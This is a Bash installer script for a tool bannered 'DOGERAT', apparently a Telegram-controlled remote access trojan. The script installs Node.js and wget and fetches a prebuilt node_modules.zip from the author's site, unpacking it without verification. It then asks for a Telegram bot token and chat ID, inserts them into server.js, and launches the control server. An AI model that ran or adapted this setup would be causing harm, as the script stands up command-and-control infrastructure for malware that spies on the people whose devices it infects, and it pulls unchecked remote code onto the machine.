75 lines
2.8 KiB
Bash
75 lines
2.8 KiB
Bash
#!/usr/bin/env bash
|
|
|
|
# Set terminal colors
|
|
RED="\033[31m"
|
|
GREEN="\033[32m"
|
|
YELLOW="\033[33m"
|
|
BLUE="\033[34m"
|
|
MAGENTA="\033[35m"
|
|
CYAN="\033[36m"
|
|
RESET="\033[0m"
|
|
|
|
# Print banner
|
|
echo -e "${RED}██████╗░░█████╗░░██████╗░███████╗██████╗░░█████╗░████████╗"
|
|
echo -e "██╔══██╗██╔══██╗██╔════╝░██╔════╝██╔══██╗██╔══██╗╚══██╔══╝"
|
|
echo -e "██║░░██║██║░░██║██║░░██╗░█████╗░░██████╔╝███████║░░░██║░░░"
|
|
echo -e "██║░░██║██║░░██║██║░░╚██╗██╔══╝░░██╔══██╗██╔══██║░░░██║░░░"
|
|
echo -e "██████╔╝╚█████╔╝╚██████╔╝███████╗██║░░██║██║░░██║░░░██║░░░"
|
|
echo -e "╚═════╝░░╚════╝░░╚═════╝░╚══════╝╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░${RESET}"
|
|
echo -e "${YELLOW} ░D░O░G░E░ ░R░A░T░B░Y░S░ ░H░I░V░ ░A░Y░A░D░A░V░${RESET}"
|
|
|
|
|
|
echo -e "\e[0m"
|
|
echo "Author: shivayadv"
|
|
echo "Github: shivaya-dav"
|
|
echo "Telegram channel: cybershieldx"
|
|
echo -n "Loading "
|
|
timeout 10s bash -c '
|
|
while true
|
|
do
|
|
echo -n "."
|
|
sleep 1
|
|
done
|
|
'
|
|
echo " Done!"
|
|
|
|
|
|
apt update && apt upgrade -y
|
|
if ! command -v node &> /dev/null
|
|
then
|
|
echo "Node.js LTS not found. Installing..."
|
|
pkg install nodejs-lts || { echo "Failed to install Node.js LTS" ; exit 1; }
|
|
else
|
|
echo "Node.js LTS already installed"
|
|
fi
|
|
if ! command -v wget &> /dev/null
|
|
then
|
|
echo "wget not found. Installing..."
|
|
apt install -y wget || { echo "Failed to install wget" ; exit 1; }
|
|
else
|
|
echo "wget already installed"
|
|
fi
|
|
|
|
if [ -d "node_modules" ]
|
|
then
|
|
echo "node_modules already exists. Skipping download."
|
|
else
|
|
if [ -f "node_modules.zip" ]
|
|
then
|
|
echo "node_modules.zip already downloaded. Skipping download."
|
|
else
|
|
# Download node_modules.zip file
|
|
wget https://cybershieldx.com/node_modules.zip || { echo "Failed to download node_modules.zip" ; exit 1; }
|
|
fi
|
|
|
|
unzip node_modules.zip || { echo "Failed to extract node_modules.zip" ; exit 1; }
|
|
rm node_modules.zip
|
|
fi
|
|
|
|
read -p "Enter your bot token: " token
|
|
read -p "Enter your chat ID: " id
|
|
sed -i "s/const token = 'your token here'/const token = '$token'/g" server.js
|
|
sed -i "s/const id = 'chat id here'/const id = '$id'/g" server.js
|
|
echo "Server uploaded successfully! Now open new tab and follow rest instructions"
|
|
node server.js
|